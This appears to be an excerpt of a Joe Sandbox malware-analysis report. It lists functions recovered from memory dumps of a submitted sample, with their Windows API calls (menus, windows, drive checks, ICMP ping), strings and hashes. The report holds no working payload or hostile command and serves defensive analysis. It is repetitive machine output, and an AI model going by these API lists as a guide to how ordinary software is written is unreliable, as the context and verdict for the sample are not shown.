ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF5A
DeleteObject.GDI32(00000000), ref: 00ADBF6C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: f2f726cfa30399771d02156fd7eb042de117e0bfc3a483c2f8cb3eccfd78ffec
Instruction ID: 7e05c1d50fa0b5cda0f6f688c2c629f740218583cea6ddd1ad92ede94abc07b6
Opcode Fuzzy Hash: f2f726cfa30399771d02156fd7eb042de117e0bfc3a483c2f8cb3eccfd78ffec
Instruction Fuzzy Hash: 43618B31501611DFCB359F28DD48B2AB7F1FB45316F10852AE54287AE0CB79ACA1DF91

Function 00AA21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetSysColor.USER32(0000000F), ref: 00AA21D3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8329e25dc964546f955d3ecb15f1ca597003f7b1329549df1ac49ecf6c475905
Instruction ID: 192401363d9602fb139a38087a072c96e90e02e57d98504b7be079dc7846ebd3
Opcode Fuzzy Hash: 8329e25dc964546f955d3ecb15f1ca597003f7b1329549df1ac49ecf6c475905
Instruction Fuzzy Hash: 48419F311001519ADB215F2CDC88BB93B76EB07331F584366FD669B2E6CB318C66DB61

Function 00B0AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B2F910), ref: 00B0AB76
GetDriveTypeW.KERNEL32(00000061,00B5A620,00000061), ref: 00B0AC40
_wcscpy.LIBCMT ref: 00B0AC6A

Strings

cdrom, xrefs: 00B0AB92
all, xrefs: 00B0AB7C
removable, xrefs: 00B0ABA8
unknown, xrefs: 00B0AC01
network, xrefs: 00B0ABD4
fixed, xrefs: 00B0ABBE
ramdisk, xrefs: 00B0ABEA

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 56d20513b917b9b9e2011157c38204d93086408b1121b6a61833d1bc5c68ec67
Instruction ID: ab6e363b149887e99be901ffae963c22248e154123271fd1a16bedd0513bb115
Opcode Fuzzy Hash: 56d20513b917b9b9e2011157c38204d93086408b1121b6a61833d1bc5c68ec67
Instruction Fuzzy Hash: D15177311083019BC720EF14C991EAABBE5EF95341F1449ADF896572E2EB31DA4ACA53

Function 00AA9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00AA99C2
__swprintf.LIBCMT ref: 00AA9A0C
__i64tow.LIBCMT ref: 00ADFA0F

Strings

%.15g, xrefs: 00AA9A06
0x%p, xrefs: 00ADF9F1
False, xrefs: 00ADF9D7
True, xrefs: 00ADF9D0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: df9f7637fa57eead0a1cfa625bf2d2e9a07154732ffabac15946408b805379dc
Instruction ID: b27b82e2a9cbcfe256789aa23050d51fa496982bb5ccd649ccbcfc9b73494157
Opcode Fuzzy Hash: df9f7637fa57eead0a1cfa625bf2d2e9a07154732ffabac15946408b805379dc
Instruction Fuzzy Hash: 7B41AF71A04205AEDB24AB78DD42F7BB7F8EB45300F2044AFE54AD72A5EB7199428B11

Function 00B273C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B273D9
CreateMenu.USER32 ref: 00B273F4
SetMenu.USER32(?,00000000), ref: 00B27403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27490
IsMenu.USER32(?), ref: 00B274A6
CreatePopupMenu.USER32 ref: 00B274B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B274DD
DrawMenuBar.USER32 ref: 00B274E5

Strings

F, xrefs: 00B274D1
0, xrefs: 00B273CF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 440e8349e27545986c088dbf51164adc756304af77eae5450f348b4b03434171
Instruction ID: 7d00c781a9568c3e629d9c2d5726af6f51f66553a93f1c0c72c2403b65e340c5
Opcode Fuzzy Hash: 440e8349e27545986c088dbf51164adc756304af77eae5450f348b4b03434171
Instruction Fuzzy Hash: 5F414775A00216EFDB20EF64E984EAABBF9FF49300F144069E95997360DB35A910CB94

Function 00B2772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B277CD
CreateCompatibleDC.GDI32(00000000), ref: 00B277D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B277E7
SelectObject.GDI32(00000000,00000000), ref: 00B277EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B277FA
DeleteDC.GDI32(00000000), ref: 00B27803
GetWindowLongW.USER32(?,000000EC), ref: 00B2780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B27821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B2782D

Strings

static, xrefs: 00B27765

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: d3e15c867c3773be4e366ce556f872faad73fcb72e939ec1c1ad1657f9776d84
Instruction ID: 16783133d2b61beed3b966bc4dd777ccf6382f84e82c6adf1d8b93e012ea9c8b
Opcode Fuzzy Hash: d3e15c867c3773be4e366ce556f872faad73fcb72e939ec1c1ad1657f9776d84
Instruction Fuzzy Hash: 7E316331105125BBDF225F65DC09FEB3BB9FF09721F110264FA19960A0CB31D812DBA4

Function 00AC7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC707B

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

__gmtime64_s.LIBCMT ref: 00AC7114
__gmtime64_s.LIBCMT ref: 00AC714A
__gmtime64_s.LIBCMT ref: 00AC7167
__allrem.LIBCMT ref: 00AC71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71D9
__allrem.LIBCMT ref: 00AC71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC720E
__allrem.LIBCMT ref: 00AC7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7243
__invoke_watson.LIBCMT ref: 00AC72B4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: c8b5f6e57ce7992d2ee0d5fc25629f7d81c9942c0d1a6a0697e0e89a3f541a59
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 7B71B576A04716ABDB149F79CD42FAEB3B8AF14320F15422EF915E6381E770DA408B90

Function 00B02A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02A31
GetMenuItemInfoW.USER32(00B66890,000000FF,00000000,00000030), ref: 00B02A92
SetMenuItemInfoW.USER32(00B66890,00000004,00000000,00000030), ref: 00B02AC8
Sleep.KERNEL32(000001F4), ref: 00B02ADA
GetMenuItemCount.USER32(?), ref: 00B02B1E
GetMenuItemID.USER32(?,00000000), ref: 00B02B3A
GetMenuItemID.USER32(?,-00000001), ref: 00B02B64
GetMenuItemID.USER32(?,?), ref: 00B02BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02C24

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: d40cb845a48f4e4141a01d4a82c3e0a224a4a579b4b49fd84ff2aeceb0fa447b
Instruction ID: 5a19d92a8795d5c3bbfaf0d7b95db9d28c99baff6b38d0ceecdcfba32e06949c
Opcode Fuzzy Hash: d40cb845a48f4e4141a01d4a82c3e0a224a4a579b4b49fd84ff2aeceb0fa447b
Instruction Fuzzy Hash: A86180B090024AAFEF21CF54D98CEBEBFF8EB45304F1445A9E84197291DB71AD09DB20

Function 00B27192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B27214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B27217
GetWindowLongW.USER32(?,000000F0), ref: 00B2723B
_memset.LIBCMT ref: 00B2724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B2725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B272D6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 005c74a48b680a523ca1b357e41dfb7adc8251f74248e858e758b3c2669e3a5e
Instruction ID: c23964e044dedc9b7c013ed91e2de24e7e3d55265f31dce2fd46152eeb44edc1
Opcode Fuzzy Hash: 005c74a48b680a523ca1b357e41dfb7adc8251f74248e858e758b3c2669e3a5e
Instruction Fuzzy Hash: 73617C71940218AFDB10DFA4DC81EEE77F8EF09700F14019AFA14A72A1DB74AD46DBA4

Function 00AF710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF7135
SafeArrayAllocData.OLEAUT32(?), ref: 00AF718E
VariantInit.OLEAUT32(?), ref: 00AF71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF71C0
VariantCopy.OLEAUT32(?,?), ref: 00AF7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF7227
VariantClear.OLEAUT32(?), ref: 00AF723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00AF7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF7252
VariantClear.OLEAUT32(?), ref: 00AF7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF726F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9ae244ef5b85ca97743b9247b79bed6e523e59a39539277880fb65c0b6163e2b
Instruction ID: cddde56d71a18841edc5925548d0f0bf5011284a1dcd5e17ee26f94cc2c45689
Opcode Fuzzy Hash: 9ae244ef5b85ca97743b9247b79bed6e523e59a39539277880fb65c0b6163e2b
Instruction Fuzzy Hash: 14413075900119AFCB10EFA8D9449FEBBB9EF08354F008075FA15A7361DB70A946CB90

Function 00B15A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B15AA6
inet_addr.WSOCK32(?,?,?), ref: 00B15AEB
gethostbyname.WSOCK32(?), ref: 00B15AF7
IcmpCreateFile.IPHLPAPI ref: 00B15B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B15C00
WSACleanup.WSOCK32 ref: 00B15C06

Strings

Ping, xrefs: 00B15B29

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4c81cecc1956d3e8fd05fb660c2717c078b3a53e601bdf683f2d0620a09c6507
Instruction ID: 2d008a99133e0ba49b6c45dd37fcd3518393ca513d30aaac199793abbbbc9ad9
Opcode Fuzzy Hash: 4c81cecc1956d3e8fd05fb660c2717c078b3a53e601bdf683f2d0620a09c6507
Instruction Fuzzy Hash: AC519F31608701DFDB20AF24CD85B6BB7E4EF88710F4489AAF555DB2E1DB70E8818B55

Function 00B0B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0B7B1
GetLastError.KERNEL32 ref: 00B0B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00B0B828

Strings

UNKNOWN, xrefs: 00B0B7E0
NOTREADY, xrefs: 00B0B7E7
INVALID, xrefs: 00B0B7FA
READONLY, xrefs: 00B0B7F3
READY, xrefs: 00B0B801

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: fde78c5216253b8eded3c9b6af70543acc158ad780fa349560c0e7181e8edb4b
Instruction ID: d30f2bdf5c2c1cf72d1dad038ada3febb0b05bc7623caac372ecd67b49af3395
Opcode Fuzzy Hash: fde78c5216253b8eded3c9b6af70543acc158ad780fa349560c0e7181e8edb4b
Instruction Fuzzy Hash: 6C318035A002099FDB10EF64C985EBE7BF8EF45740F1081A9E902E72E1DB719D46C751

Function 00AF9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF94F6
GetDlgCtrlID.USER32 ref: 00AF9501
GetParent.USER32 ref: 00AF951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9520
GetDlgCtrlID.USER32(?), ref: 00AF9529
GetParent.USER32(?), ref: 00AF9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9548

Strings

ComboBox, xrefs: 00AF947E
ListBox, xrefs: 00AF94B3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f76610edccd764fe4189ccad20e46a0def628601f4f0532939385d09e2a0ad2a
Instruction ID: 4f82864cbdc95e1a1aea629d2d477f8d8295bad0a9eaa4b598af9f7309339110
Opcode Fuzzy Hash: f76610edccd764fe4189ccad20e46a0def628601f4f0532939385d09e2a0ad2a
Instruction Fuzzy Hash: 3521A474E00208BBDF05ABA4CC85EFEBB74EF55310F104165BA61972E1DF755919DB20

Function 00AF955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF95DF
GetDlgCtrlID.USER32 ref: 00AF95EA
GetParent.USER32 ref: 00AF9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9609
GetDlgCtrlID.USER32(?), ref: 00AF9612
GetParent.USER32(?), ref: 00AF962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9631

Strings

ComboBox, xrefs: 00AF9569
ListBox, xrefs: 00AF959E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
